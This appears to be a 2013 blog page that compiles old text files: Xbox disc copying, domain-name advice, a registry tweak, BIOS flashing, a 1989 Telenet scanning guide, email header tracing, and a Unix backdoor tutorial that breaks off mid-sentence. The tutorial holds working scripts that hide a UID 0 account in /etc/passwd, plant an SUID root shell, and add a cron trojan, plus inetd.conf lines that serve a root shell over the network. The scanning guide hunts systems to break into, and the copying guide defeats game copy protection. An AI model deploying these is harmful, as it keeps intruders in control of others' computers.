Monday, January 14, 2013

COPY X BOX GAMES!

 BURNING X-BOX & GAMECUBE GAMES USEING CDRWIN
------------------------------------------------------
1) Insert your original in your CD-ROM.
2) Open CDRWin (or any other image extractor) to make an iso image of the game
on your hard disc. Click on 'Extract Disc/Tracks/Sectors'
3) Here are the settings which work for me (!):
Disc Image/Cue sheet
File-Format: Automatic
Reading-Options:
RAW, CD+G, CD-TEXT and MCN/USRC all Unchecked
Error Recovery: Ignore
Jitter Correction: Auto
Subcode Analyses: Fixed
Data-Speed: MAX
Read Retry Count: 10
Audio Speed: MAX
Subcode Threshold: 900
There are a lot of reports, that Raw reading also works, but I had problems with it enabled.
4) Click on 'Start'
--------------------------------------------------------------------------------
RECORDING TO A DISC
--------------------------------------------------------------------------------
1) Install Fireburner

2) Double click on the Cue File For The Game
3) Right Click And select burn To CD
That?s all there is record DAO, and you can try to burn it fast at 2X
Using PNY Black Diamond CDR'

Choosing A Good Domain Name, ya..good name is important!

Another good tip for successful web experience..injoy it!



Choosing A Good Domain Name


Choosing a domain name for your site is one of the most important steps towards creating the perfect internet presence. If you run an on-line business, picking a name that will be marketable and achieve success in search engine placement is paramount. Many factors must be considered when choosing a good domain name. This article summarizes all the different things to consider before making that final registration step!


Short and Sweet

Domain names can be really long or really short (1 - 67 characters). In general, it is far better to choose a domain name that is short in length. The shorter your domain name, the easier it will be for people remember. Remembering a domain name is very important from a marketability perspective. As visitors reach your site and enjoy using it, they will likely tell people about it. And those people may tell others, etc. As with any business, word of mouth is the most powerful marketing tool to drive traffic to your site (and it's free too!). If your site is long and difficult to pronounce, people will not remember the name of the site and unless they bookmark the link, they may never return.


Consider Alternatives

Unless a visitor reaches your site through a bookmark or a link from another site, they have typed in your domain name. Most people on the internet are terrible typists and misspell words constantly. If your domain name is easy to misspell, you should think about alternate domain names to purchase. For example, if your site will be called "MikesTools.com", you should also consider buying "MikeTools.com" and "MikeTool.com". You should also secure the different top level domain names besides the one you will use for marketing purposes ("MikesTools.net", "MikesTools.org", etc.) You should also check to see if there are existing sites based on the misspelled version of the domain name you are considering. "MikesTools.com" may be available, but "MikesTool.com" may be home to a graphic pornography site. You would hate for a visitor to walk away thinking you were hosting something they did not expect.

Also consider domain names that may not include the name of your company, but rather what your company provides. For example, if the name of your company is Mike's Tools, you may want to consider domain names that target what you sell. For example: "buyhammers.com" or "hammer-and-nail.com". Even though these example alternative domain names do not include the name of your company, it provides an avenue for visitors from your target markets. Remember that you can own multiple domain names, all of which can point to a single domain. For example, you could register "buyhammers.com", "hammer-and-nail.com", and "mikestools.com" and have "buyhammers.com" and "hammer-and-nail.com" point to "mikestools.com".


Hyphens: Your Friend and Enemy

Domain name availability has become more and more scant over the years. Many single word domain names have been scooped up which it makes it more and more difficult to find a domain name that you like and is available. When selecting a domain name, you have the option of including hyphens as part of the name. Hyphens help because it allows you to clearly separate multiple words in a domain name, making it less likely that a person will accidentally misspell the name. For example, people are more likely to misspell "domainnamecenter.com" than they are "domain-name-center.com". Having words crunched together makes it hard on the eyes, increasing the likelihood of a misspelling. On the other hand, hyphens make your domain name longer. The longer the domain name, the easier it is for people to forget it altogether. Also, if someone recommends a site to someone else, they may forget to mention that each word in the domain name is separated by a hyphen. If do you choose to leverage hyphens, limit the number of words between the hyphens to three. Another advantage to using hyphens is that search engines are able to pick up each unique word in the domain name as key words, thus helping to make your site more visible in search engine results.


Dot What?

There are many top level domain names available today including .com, .net, .org, and .biz. In most cases, the more unusual the top level domain, the more available domain names are available. However, the .com top level domain is far and away the most commonly used domain on the internet, driven by the fact that it was the first domain extension put to use commercially and has received incredible media attention. If you cannot lay your hands on a .com domain name, look for a .net domain name, which is the second most commercially popular domain name extension.


Long Arm of the Law

Be very careful not to register domain names that include trademarked names. Although internet domain name law disputes are tricky and have few cases in existence, the risk of a legal battle is not a risk worth taking. Even if you believe your domain name is untouchable by a business that has trademarked a name, do not take the chance: the cost of litigation is extremely high and unless you have deep pockets you will not likely have the resources to defend yourself in a court of law. Even stay away from domain names in which part of the name is trademarked: the risks are the same.


Search Engines and Directories

All search engines and directories are different. Each has a unique process for being part of the results or directory listing and each has a different way of sorting and listing domain names. Search engines and directories are the most important on-line marketing channel, so consider how your domain name choice affects site placement before you register the domain. Most directories simply list links to home pages in alphabetical order. If possible, choose a domain name with a letter of the alphabet near the beginning ("a" or "b"). For example, "aardvark-pest-control.com" will come way above "joes-pest-control.com". However, check the directories before you choose a domain name. You may find that the directories you would like be in are already cluttered with domain names beginning with the letter "a". Search engines scan websites and sort results based on key words. Key words are words that a person visiting a search engine actually search on. Having key words as part of your domain name can help you get better results.

Changing Default Location For Installing Apps

Change The Default Location For Installing Apps
-----------------------------------------------

As the size of hard drives increase, more people are using partitions to separate and store groups of files.

XP uses the C:\Program Files directory as the default base directory into which new programs are installed. However, you can change the default installation drive and/ or directory by using a Registry hack.

Go to :-

- Start > Run

- Type “regedit” (without “” NOOBS!)

- Go to this directory…
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion

- Look for the value named ProgramFilesDir. by default,this value will be C:\Program Files. Edit the value to any valid drive or folder and XP will use that new location as the default installation directory for new programs.

BIOS Update Procedure

BIOS Update Procedure

All latest Motherboards today, 486/ Pentium / Pentium Pro etc.,ensure that upgrades are easily obtained by incorporating the system BIOS in a FLASH Memory component. With FLASH BIOS, there is no need to replace an EPROM component. Once downloaded, the upgrade utility fits on a floppy disc allowing the user to save, verify and update the system BIOS. A hard drive or a network drive can also be used to run the newer upgrade utilities. However, memory managers can not be installed while upgrading.

Most pre-Pentium motherboards do not have a Flash BIOS. The following instructions therefore do not apply to these boards. If your motherboard does not have a Flash BIOS (EEPROM) you will need to use an EPROM programmer to re-program the BIOS chip. See your dealer for more information about this.

Please read the following instructions in full before starting a Flash BIOS upgrade:
A. Create a Bootable Floppy (in DOS)

•With a non-formatted disk, type the following:

format a:/s

•If using a formatted disk, type:

sys a:

This procedure will ensure a clean boot when you are flashing the new BIOS.

B. Download the BIOS file

•Download the correct BIOS file by clicking on the file name of the BIOS file you wish to download.

•Save the BIOS file and the Flash Utility file in the boot disk you have created. Unzip the BIOS file and the flash utility file. If you don't have an "unzip" utility, download the WinZip for Windows 95 shareware/ evaluation copy for that one time use from _www.winzip.com or _www.pkware.com. Most CD ROMs found in computer magazines, have a shareware version of WinZip on them.

•You should have extracted two files:

Flash BIOS utility eg: flash7265.exe (for example)

BIOS eg: 6152J900.bin (example)

Use the latest flash utility available unless otherwise specified (either on the BIOS update page or in the archive file). This information is usually provided.

C. Upgrade the System BIOS

During boot up, write down the old BIOS version because you will need to use it for the BIOS backup file name.

Place the bootable floppy disk containing the BIOS file and the Flash Utility in drive a, and reboot the system in MS-DOS, preferably Version 6.22

•At the A:> prompt, type the corresponding Flash BIOS utility and the BIOS file with its extension.

For example:

flash625 615j900.bin

•From the Flash Memory Writer menu, select "Y" to "Do you want to save BIOS?" if you want to save (back up) your current BIOS (strongly recommended), then type the name of your current BIOS and its extension after FILE NAME TO SAVE: eg: a:\613J900.bin

Alternatively select "N" if you don't want to save your current BIOS. Beware, though, that you won't be able to recover from a possible failure.

•Select "Y" to "Are you sure to program?"

•Wait until it displays "Message: Power Off or Reset the system"

Once the BIOS has been successfully loaded, remove the floppy disk and reboot the system. If you write to BIOS but cannot complete the procedure, do not switch off, because the computer will not be able to boo, and you will not be given another chance to flash. In this case leave your system on until you resolve the problem (flashing BIOS with old file is a possible solution, provided you've made a backup before)

Make sure the new BIOS version has been loaded properly by taking note of the BIOS identifier as the system is rebooting.

For AMI BIOS
Once the BIOS has been successfully loaded, remove the floppy disk and reboot the system holding the "END" key prior to power on until you enter CMOS setup. If you do not do this the first time booting up after upgrading the BIOS, the system will hang.

BIOS Update Tips
note:
1.Make sure never to turn off or reset your computer during the flash process. This will corrupt the BIOS data. We also recommend that you make a copy of your current BIOS on the bootable floppy so you can reflash it if you need to. (This option is not available when flashing an AMI BIOS).

2. If you have problems installing your new BIOS please check the following:

Have you done a clean boot?
In other words, did you follow the above procedure for making a bootable floppy? This ensures that when booting from "A" there are no device drivers on the diskette. Failing to do a clean boot is the most common cause for getting a "Memory Insufficient" error message when attempting to flash a BIOS.

If you have not used a bootable floppy, insure a clean boot either by

a) pressing F5 during bootup

b) by removing all device drivers on the CONFIG.SYS including the HIMEM.SYS. Do this by using the EDIT command.

Have you booted up under DOS?
Booting in Windows is another common cause for getting a "Memory Insufficient" error message when attempting to flash a BIOS. Make sure to boot up to DOS with a minimum set of drivers. Important: Booting in DOS does not mean selecting "Restart computer in MS-DOS Mode" from Windows98/95 shutdown menu or going to Prompt mode in WindowsNT, but rather following the above procedure (format a: /s and rebooting from a:\).

Have you entered the full file name of the flash utility and the BIOS plus its extension?
Do not forget that often you will need to add a drive letter (a:\) before flashing the BIOS. Example: when asked for file name of new BIOS file which is on your floppy disk, in case you're working from c:\ your will need to type a:\615j900.bin, rather than 615j900.bin only.

Basic Networking


11/20/89                -----------------------------
7:30 EST-10:46Est       - A File By Sk8 The SkinHead-
                        -----------------------------


                             BASIC NETWORKING

     Well, many people have asked me "how do i use Telenet".."how do i use an outdial". Well i have decided to write a very basic file on telenet and how to get around on the networks.

     Well Telenet and others are PSN's or (Packet Switching Networks) these nets are connected to many other networks around the world.  You can do alot with just basic knowledge that i have (most of you will know this and way beyond what i know but some will benefit from it) i will start with some of the terms that are often used with these services.

Access Number- The direct number that you dial to access a network (duh).

Nua (Network Users Address) - An Nua is basicly a number you type in to access that particular service think of an Nua as a phone number sorta its not an actually phone number with an Acn country code or whatever because the service is connected to the network world wide.  I hope that was fairly clear let me show this think of the planet earth as an network and  to reach the services on the planet you call the phone number like the service is a persons residence or business phone or payphone whatever just like on a network an Nua is the Address to a system or outdial whatever on the particular network. I hope this is clear or atleast somewhat understood.

Nui (Network User Identification) - An Nui is like a Account and Password to the network like an account and password is to a bbs that lets you access the system.  Some people use Nui for like anything like an Vax system Unix systems they are referring to an Nui as basicly a account on the particular system that lets you use the system.

DNIC (Data Network Identification Code) - The DNIC is like a 4 digit code that represents what Psn it is think of an DNIC like an AreaCode and the Nua the individual phone number.

Outdial - Is basicly what it says an modem port connected somewhere on the network that will allow you to dial out from and connect data only to a actually phone number not an Nua.

Pad (Packet Assemble Disassembler) - an x.25 pad is very useful an pad using x.25. protocal transmits at 9600 bps to an Nua. This may sound funny but i call them "Launch Pads" heh like with an x.25 you can usally access any Nua on the planet by usally typing the Dnic+Nua.



       Now i will explain various things and give helpful ideas.



     Let me start off with some helpful things for you to try and do.

                                 TeleNet

    
     The first thing your going to have to have is your Access number it is very easy to get your local access number.  Simply call telenet at 1-800-TELENET that is thier customer service number and ask for your dialup the operator will ask for your area code and prefix of your phone number he/she will also ask your baud rate.  There are many telenet ports across the country and internationly with varying baud rates from 110 bps (yuck) to 9600 (i wish i had) so you will want your maximum baud port most locations have atleast 1200 many have 2400 and not alot have 9600 ports like for big cities like Detroit and Los Angeles at the end of the file i will list some useful numbers.
Some things to do while online with Telenet and Tymnet.  While at the @ on the Telenet system type "mail" or "C mail" or "telemail" or even "c telemail" this access's telenets mail system simple entitled "Telemail" from there it will ask "user name" or something like that type "phones" next it will prompt you "password" enter "phones".  The phones service has alot of worthy information it will give you a menu to choose from the rest should be self explanatory.  Along with the other information on the phones service there is a complete updated list of all Telenet access numbers which is conveinent.  Once you have tried the phones service also on telemail enter "Intl/Associates" as the user name and "Intl" for the international access numbers.  If you are calling from overseas somewhere connect with an telenet access number then type this Nua at the telenet @ prompt "311020200142" and enter the username and password.
You might want to pick up a sort of a reference booklet on Telenet simply again call the customer service number and ask them for "How to use Telenet's Asychronus Dial Service" and give them your address which is self explanatory.
Another tidbit of info you would like to know if you already didnt know that Telenet is owned by Us Sprint long distance service.




                               Tymnet

     The same goes for Tymnet service you will first need an Access Number.  Simply call Tymnet customer service at 1-800-872-7654 and ask them.  Again you might like to get Tymnets reference booklet on how to use there system simply again ask them to send it to you.  Once online with a Tymnet access number type "Information" at the user name prompt and you will be connected to another nice thing on tymnet which you have access to all thier Access Numbers also just like the "phones" service on Telenet.  Tymnet is owned by "Mcdowell Douglas" corporation.  Unlike Telenet where a long distance company owns the network.  On Tymnet in the "Information" service there is a very cool option that will provide you with all the Dnic's (Networks) available from Tymnet.  You may also want to get that on buffer but for your conveinience i will include a copy of that.  The file "Basic.NetworksII" is the complete listing and i would like the Basic.NetworksII file to be accompanied by this file for the most part.
 


                            Outdials

     Now i will discuss Outdials and tell how to use them.  An Outdial on Telenet is an Pcp Port usally.  It will enable you to connect data with a carrier.  An Outdial is a modem connected up to the network to access the outdial spimply type the outdials Nua.  Usally you will need a Nui or Pad to use an Outdial on Telenet just to let you know.  Once connected to an Outdial on Telenet type "Ctrl-e" to get into the command mode of the Outdial or if your sharp on your Hayes modem AT command set just issue the commands thru the Outdial besure to type "Atz" when logged in to reset the modem parameters to default values.  Outdials range from different baud rates just like what kind of modem is hooked into the Outdial port.  This is the basic Telenet Outdial but there are many types a Tymnet Asychronus is a very good Outdial to use like i said there are many different types the above is for Telenet Pcp Outdials which are used most widely.


                        Scanning Telenet


     Well now i will explain how to scan telenet and how to find Pcp outdials etc.  When scanning telenet call your Access Number and at the prompt enter the Nua.  Plan to scan a certain amount of Nua's in a session wether the number is up to you, usally when i scan i scan in blocks of 100 you can find alot of things while scanning.  I will tell how to find pcp outdials, first if your looking for a particular area code for the outdial take the 313 area code for example usally an outdial is in the first 150 numbers scanned so i would suggest if scanning for outdials scan like this..the area code for which you want the outdial two 0's then a three digit number so the scan would look like this...31300001,31300002,31300003 etc.. im sure you get it...along the way you will probably find other neat things.  Some things to know when scanning telenet is when you enter an Nua and it freezes like wont do anything send a break signal, for me i use Proterm for the Apple the break signal is open-apple b once the break signal is sent it should go back to a @ prompt again.  If you try scanning another nua directly after you broke out from the frozen portion Telenet will give you an error message "Connection Pending" which means it is still looking for the Nua system from which you requested previously.  To remedy this situation after the break signal is sent type "d" for disconnect it will then tell you the connection has been terminated. Proceed scanning the Nua continuing where you left off. (Note. you will get the freeze and have to repeat the sequence over and over again as of there are A LOT of Nuas that freeze) Well i bet your asking "how do i know when ive found an outdial?" usally Telenet will respond with a connect message and then nothing try to type "Atz" if it responds "ok" then you have a Outdial port where as Atz is the hayes modem command for reseting the modems paramaters to default settings.  Ok now i will explain some things to look for and some wise things to do while scanning and also supply an response key explanations.
Whenever you "Connected" to an Nua write it down no matter what it is make notes of what you find and label them for instance if you encounter any of these messages.

   User Name = a Vax System
   Login = a Unix system
   Primenet = a prime system
   Password = something worth noting

Basicly anything that connects take note of this is very useful for finding systems to hack on even though most or all of Telenet has been scanned at one time or another there are always somethings to do! that is a FACT!  Be sure to write down all "Refused Collect Connection" also because we must not forget that when we request an Nua that we are asking for a collect call all Nuas inputed on Telenet without an Nui are being paid for by the particlar system requested that is why when an Outdials Nua is requested without any sort of Pad,Nui etc. it will not excecpt the call in all cases i have encountered

Here is a list of Network Messages that Telenet will respond with remember these are for any type of Telenet access the following may appear and a completed explanation. 

        @ is the network command prompt
       
        ? the last entry was invalid
   
        Access Bared - Your connection request does not allow you to                 connect to this system

        Access to This Address not permitted - Your Nui is not authorized to            access the address you typed

        Attempt Aborted - You enterd the disconnect command (as we said before          when it freezes when scanning)

        Busy - All the ports,destinations are in use try again later

        Collect Wats Call Not Permitted - Collect Wats calls not permitted by           your host or authorized by your Nui

        Connected - Your terminal has been connected to the Nua system you              requested

        Connection From - Your terminal has been called by another computer or          terminal

        Connection Pending - The Network is try to establish a connection with          the Nua you requested (enter the d command or "bye" to disconnect the           attempt)

        Disconnected - Your terminal has been disconnected from the terminal            you called

        Enhanced Network Services System Error - Your call couldnt be                 validated contact customer service

        Enhanced Network services unavailable at this time - Serivce is                 temporarily unavailable try again later

        Illegal Address - enter the Connect sequence again whether it be an Nua         or a system name

        Invalid Charge Request -  your payment selection is not valid

        Invalid User Id or Password - The Nui you entered is not valid
       
        Local Congestion - Your local Access number is busy try again in a              couple minutes

        Local Disconnect - Your Terminal has been disconnected

        Local Network Outage - A temporary problem is preventing you from using         the network

        Local Procedure Error - Communication problems by the network caused            the network to clear your call

        Not Available,Not Operating,Not Responding -  Your Computer cannot              accept your request for connection try later

        Not Connected - You have entered a command thai s only valid when               connected to a system type "cont" to be brought back into the                 connection

        Not Reachable - A temporary conditon prevents you from using the                network

        Password - This is the prompt which apprears after youve entered an Nui

        *** Possible Data Loss - connecton has been reset

        Refused Collect Connection - Your payment selection must be prepaid

        Rejecting - Host copmputer refuses to accept the call

        Remote Procedure Error - Communication problems forced the network to           clear our call

        Still Connected - You requested another service while your online to            another

        Telenet XXX XXX - Network Port you are using

        Terminal - This is the terminal type prompt

        Unable to validate call - Your Nui has been temporarily disbaled

        Unable to validate call contact admin - The Nui has been permently              disabled
       
        Unknown Adress - Your Nua may be invalid

        Wats Call not permitted - Telenet In-wats calls are not permitted by            your host or your Nui


Well that is the end of the Telenet messages and this is the end of our file only left is the numbers i have and some other usual stuff


Telenet Customer service 1-800-TELENET
Tymnet Customer service 1-800-872-7654
Telenet Access # 313/964-2988 1200 bps 313/963-2274 2400 313/964-3133 9600 bps
Tymnet Access# 313/962-2870
Global Outdial at 20200123

Well that is about it id like to greet some people here SoldierOfFortune,Frodo,TheBit,Hellraiser,Icecube,Slaytanic,Corrupt,Lorax,Deadman#The Disk Master,The Hunter,DPAK,MOD,Rat,The Traxster,The Apple Bandit,El Cid,Shadow,Blue Adept,Blacknight,LOD,HALE,DungeonMaster,Blackbeard,Kilroy,The Whole Interchat scene,All my buddys from the alliances,Gambler,Sabers Edge,Misfit,The Flash,Qsd friends,All the people who called my Vmb'z for "Rad Infoz" and helped to keep it going and all the whole people you make a difference "All you Kids out There keep the Faith!"

I can be reached on Funtime Gs at 305-989-0181 d215*guest is the new user pass
I can be reached at this Vmb 313-980-5632
and soon im going to be running a bbs with a friend of mine so be sure to look for that like i said im outta here Slaytze!!!!


Text-Files 2:

Backtracking EMAIL Messages

Backtracking EMAIL Messages 

Tracking email back to its source: Twisted Evil
cause i hate spammers... Evil or Very Mad

Ask most people how they determine who sent them an email message and the response is almost universally, "By the From line." Unfortunately this symptomatic of the current confusion among internet users as to where particular messages come from and who is spreading spam and viruses. The "From" header is little more than a courtesy to the person receiving the message. People spreading spam and viruses are rarely courteous. In short, if there is any question about where a particular email message came from the safe bet is to assume the "From" header is forged.

So how do you determine where a message actually came from? You have to understand how email messages are put together in order to backtrack an email message. SMTP is a text based protocol for transferring messages across the internet. A series of headers are placed in front of the data portion of the message. By examining the headers you can usually backtrack a message to the source network, sometimes the source host. A more detailed essay on reading email headers can be found .

If you are using Outlook or Outlook Express you can view the headers by right clicking on the message and selecting properties or options.

Below are listed the headers of an actual spam message I received. I've changed my email address and the name of my server for obvious reasons. I've also double spaced the headers to make them more readable.


Return-Path: <s359dyxtt@yahoo.com>

X-Original-To: davar@example.com

Delivered-To: davar@example.com

Received: from 12-218-172-108.client.mchsi.com (12-218-172-108.client.mchsi.com [12.218.172.108])
by mailhost.example.com (Postfix) with SMTP id 1F9B8511C7
for <davar@example.com>; Sun, 16 Nov 2003 09:50:37 -0800 (PST)

Received: from (HELO 0udjou) [193.12.169.0] by 12-218-172-108.client.mchsi.com with ESMTP id <536806-74276>; Sun, 16 Nov 2003 19:42:31 +0200

Message-ID: <n5-l067n7z$46-z$-n@eo2.32574>

From: "Maricela Paulson" <s359dyxtt@yahoo.com>

Reply-To: "Maricela Paulson" <s359dyxtt@yahoo.com>

To: davar@example.com

Subject: STOP-PAYING For Your PAY-PER-VIEW, Movie Channels, Mature Channels...isha

Date: Sun, 16 Nov 2003 19:42:31 +0200

X-Mailer: Internet Mail Service (5.5.2650.21)

X-Priority: 3

MIME-Version: 1.0

Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"


According to the From header this message is from Maricela Paulson at s359dyxxt@yahoo.com. I could just fire off a message to abuse@yahoo.com, but that would be waste of time. This message didn't come from yahoo's email service.

The header most likely to be useful in determining the actual source of an email message is the Received header. According to the top-most Received header this message was received from the host 12-218-172-108.client.mchsi.com with the ip address of 21.218.172.108 by my server mailhost.example.com. An important item to consider is at what point in the chain does the email system become untrusted? I consider anything beyond my own email server to be an unreliable source of information. Because this header was generated by my email server it is reasonable for me to accept it at face value.

The next Received header (which is chronologically the first) shows the remote email server accepting the message from the host 0udjou with the ip 193.12.169.0. Those of you who know anything about IP will realize that that is not a valid host IP address. In addition, any hostname that ends in client.mchsi.com is unlikely to be an authorized email server. This has every sign of being a cracked client system.


Here's is where we start digging. By default Windows is somewhat lacking in network diagnostic tools; however, you can use the tools at to do your own checking.

davar@nqh9k:[/home/davar] $whois 12.218.172.108

AT&T WorldNet Services ATT (NET-12-0-0-0-1)
12.0.0.0 - 12.255.255.255
Mediacom Communications Corp MEDIACOMCC-12-218-168-0-FLANDREAU-MN (NET-12-218-168-0-1)
12.218.168.0 - 12.218.175.255

# ARIN WHOIS database, last updated 2003-12-31 19:15
# Enter ? for additional hints on searching ARIN's WHOIS database.

I can also verify the hostname of the remote server by using nslookup, although in this particular instance, my email server has already provided both the IP address and the hostname.

davar@nqh9k:[/home/davar] $nslookup 12.218.172.108

Server: localhost
Address: 127.0.0.1

Name: 12-218-172-108.client.mchsi.com
Address: 12.218.172.108

Ok, whois shows that Mediacom Communications owns that netblock and nslookup confirms the address to hostname mapping of the remote server,12-218-172-108.client.mchsi.com. If I preface a www in front of the domain name portion and plug that into my web browser, http://www.mchsi.com, I get Mediacom's web site.

There are few things more embarrassing to me than firing off an angry message to someone who is supposedly responsible for a problem, and being wrong. By double checking who owns the remote host's IP address using two different tools (whois and nslookup) I minimize the chance of making myself look like an idiot.

A quick glance at the web site and it appears they are an ISP. Now if I copy the entire message including the headers into a new email message and send it to abuse@mchsi.com with a short message explaining the situation, they may do something about it.

But what about Maricela Paulson? There really is no way to determine who sent a message, the best you can hope for is to find out what host sent it. Even in the case of a PGP signed messages there is no guarantee that one particular person actually pressed the send button. Obviously determining who the actual sender of an email message is much more involved than reading the From header. Hopefully this example may be of some use to other forum regulars.

Backdoor

Ok..... You've been at it for all night. Trying all the exploits you can think of. The system seems tight. The system looks tight.
The system *is* tight. You've tried everything. Default passwds, guessable passwds, NIS weaknesses, NFS holes, incorrect
permissions, race conditions, SUID exploits, Sendmail bugs, and so on... Nothing. WAIT! What's that!?!? A "#" ???? Finally!
After seeming endless toiling, you've managed to steal root. Now what? How do you hold onto this precious super-user
privilege you have worked so hard to achieve....?

This article is intended to show you how to hold onto root once you have it. It is intended for hackers and administrators alike.
From a hacking perspective, it is obvious what good this paper will do you. Admin's can likewise benefit from this paper. Ever
wonder how that pesky hacker always manages to pop up, even when you think you've completely eradicated him from your
system?
This list is BY NO MEANS comprehensive. There are as many ways to leave backdoors into a UNIX computer as there are
ways into one.

Beforehand

Know the location of critical system files. This should be obvious (If you can't list any of the top of your head, stop reading
now, get a book on UNIX, read it, then come back to me...). Familiarity with passwd file formats (including general 7 field
format, system specific naming conventions, shadowing mechanisms, etc...). Know vi. Many systems will not have those
robust, user-friendly editors such as Pico and Emacs. Vi is also quite useful for needing to quickly seach and edit a large file. If
you are connecting remotely (via dial-up/telnet/rlogin/whatver) it's always nice to have a robust terminal program that has a
nice, FAT scrollback buffer. This will come in handy if you want to cut and paste code, rc files, shell scripts, etc...

The permenance of these backdoors will depend completely on the technical saavy of the administrator. The experienced and
skilled administrator will be wise to many (if not all) of these backdoors. But, if you have managed to steal root, it is likely the
admin isn't as skilled (or up to date on bug reports) as she should be, and many of these doors may be in place for some time
to come. One major thing to be aware of, is the fact that if you can cover you tracks during the initial break-in, no one will be
looking for back doors.



The Overt

[1] Add a UID 0 account to the passwd file. This is probably the most obvious and quickly discovered method of rentry. It
flies a red flag to the admin, saying "WE'RE UNDER ATTACK!!!". If you must do this, my advice is DO NOT simply
prepend or append it. Anyone causally examining the passwd file will see this. So, why not stick it in the middle...

#!/bin/csh
# Inserts a UID 0 account into the middle of the passwd file.
# There is likely a way to do this in 1/2 a line of AWK or SED.  Oh well.
# daemon9@netcom.com

set linecount = `wc -l /etc/passwd`
cd                                      # Do this at home.
cp /etc/passwd ./temppass               # Safety first.
echo passwd file has $linecount[1] lines.
@ linecount[1] /= 2
@ linecount[1] += 1                     # we only want 2 temp files
echo Creating two files, $linecount[1] lines each \(or approximately that\).
split -$linecount[1] ./temppass         # passwd string optional
echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd                   # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...

NEVER, EVER, change the root password. The reasons are obvious.

[2] In a similar vein, enable a disabled account as UID 0, such as Sync. Or, perhaps, an account somwhere buried deep in the
passwd file has been abandoned, and disabled by the sysadmin. Change her UID to 0 (and remove the '*' from the second
field).

[3] Leave an SUID root shell in /tmp.

#!/bin/sh
# Everyone's favorite...

cp /bin/csh /tmp/.evilnaughtyshell      # Don't name it that...
chmod 4755 /tmp/.evilnaughtyshell

Many systems run cron jobs to clean /tmp nightly. Most systems clean /tmp upon a reboot. Many systems have /tmp mounted
to disallow SUID programs from executing. You can change all of these, but if the filesystem starts filling up, people may
notice...but, hey, this *is* the overt section....). I will not detail the changes neccessary because they can be quite system
specific. Check out /var/spool/cron/crontabs/root and /etc/fstab.



The Veiled

[4] The super-server configuration file is not the first place a sysadmin will look, so why not put one there? First, some
background info: The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the
appropriate program (usally a server) when a connection request arrives. The format of the /etc/inetd.conf file is simple. Typical
lines look like this:

(1)     (2)     (3)     (4)     (5)     (6)             (7)
ftp     stream  tcp     nowait  root    /usr/etc/ftpd   ftpd
talk    dgram   udp     wait    root    /usr/etc/ntalkd ntalkd

Field (1) is the daemon name that should appear in /etc/services. This tells inetd what to look for in /etc/services to determine
which port it should associate the program name with. (2) tells inetd which type of socket connection the daemon will expect.
TCP uses streams, and UDP uses datagrams. Field (3) is the protocol field which is either of the two transport protocols, TCP
or UDP. Field (4) specifies whether or not the daemon is iterative or concurrent. A 'wait' flag indicates that the server will
process a connection and make all subsequent connections wait. 'Nowait' means the server will accept a connection, spawn a
child process to handle the connection, and then go back to sleep, waiting for further connections. Field (5) is the user (or more
inportantly, the UID) that the daemon is run as. (6) is the program to run when a connection arrives, and (7) is the actual
command (and optional arguments). If the program is trivial (usally requiring no user interaction) inetd may handle it internally.
This is done with an 'internal' flag in fields (6) and (7).
So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it
with something else. A program that creates an SUID root shell, a program that adds a root account for you in the /etc/passwd
file, etc...
For the insinuation-impaired, try this:

Open the /etc/inetd.conf in an available editor. Find the line that reads:

       
        daytime stream  tcp     nowait  root    internal

and change it to:

        daytime stream  tcp     nowait /bin/sh  sh -i. 

You now need to restart /etc/inetd so it will reread the config file. It is up to you how you want to do this. You can kill and
restart the process, (kill -9 , /usr/sbin/inetd or /usr/etc/inetd) which will interuppt ALL network connections (so it is a good idea
to do this off peak hours).

[5] An option to compromising a well known service would be to install a new one, that runs a program of your choice. One
simple solution is to set up a shell the runs similar to the above backdoor. You need to make sure the entry appears in
/etc/services as well as in /etc/inetd.conf. The format of the /etc/services file is simple:

(1)       (2)/(3)          (4)
smtp      25/tcp           mail   

Field (1) is the service, field (2) is the port number, (3) is the protocol type the service expects, and (4) is the common name
associated with the service. For instance, add this line to /etc/services:

        evil    22/tcp          evil

and this line to /etc/inetd.conf:

        evil    stream  tcp     nowait  /bin/sh sh -i

Restart inetd as before.

Note: Potentially, these are a VERY powerful backdoors. They not only offer local rentry from any account on the system,
they offer rentry from *any* account on *any* computer on the Internet.

[6] Cron-based trojan I. Cron is a wonderful system administration tool. It is also a wonderful tool for backdoors, since root's
crontab will, well, run as root... Again, depending on the level of experience of the sysadmin (and the implementation), this
backdoor may or may not last. /var/spool/cron/crontabs/root is where root's list for crontabs is usally located. Here, you have
several options. I will list a only few, as cron-based backdoors are only limited by your imagination. Cron is the clock daemon.
It is a tool for automatically executing commands at specified dates and times. Crontab is the command used to add, remove,
or view your crontab entries. It is just as easy to manually edit the /var/spool/crontab/root file as it is to use crontab. A crontab
entry has six fields:

(1)     (2)     (3)     (4)     (5)     (6)
 0       0       *       *       1       /usr/bin/updatedb     

Fields (1)-(5) are as follows: minute (0-59), hour (0-23), day of the month (1-31) month of the year (1-12), day of the week
(0-6). Field (6) is the command (or shell script) to execute. The above shell script is executed on Mondays. To exploit cron,
simply add an entry into /var/spool/crontab/root. For example: You can have a cronjob that will run daily and look in the
/etc/passwd file for the UID 0 account we previously added, and add him if he is missing, or do nothing otherwise (it may not
be a bad idea to actually *insert* this shell code into an already installed crontab entry shell script, to further obfuscate your
shady intentions). Add this line to /var/spool/crontab/root:

        0       0       *       *       *       /usr/bin/trojancode

This is the shell script:

#!/bin/csh
# Is our eviluser still on the system?  Let's make sure he is.
#daemon9@netcom.com

set evilflag = (`grep eviluser /etc/passwd`)   


if($#evilflag == 0) then                        # Is he there?
       
        set linecount = `wc -l /etc/passwd`
        cd                                      # Do this at home.
        cp /etc/passwd ./temppass               # Safety first.
        @ linecount[1] /= 2
        @ linecount[1] += 1                     # we only want 2 temp files
        split -$linecount[1] ./temppass         # passwd string optional
        echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
        cat ./xab >> ./xaa
        mv ./xaa /etc/passwd
        chmod 644 /etc/passwd                   # or whatever it was beforehand
        rm ./xa* ./temppass
        echo Done...
else
endif  

[7] Cron-based trojan II. This one was brought to my attention by our very own Mr. Zippy. For this, you need a copy of the
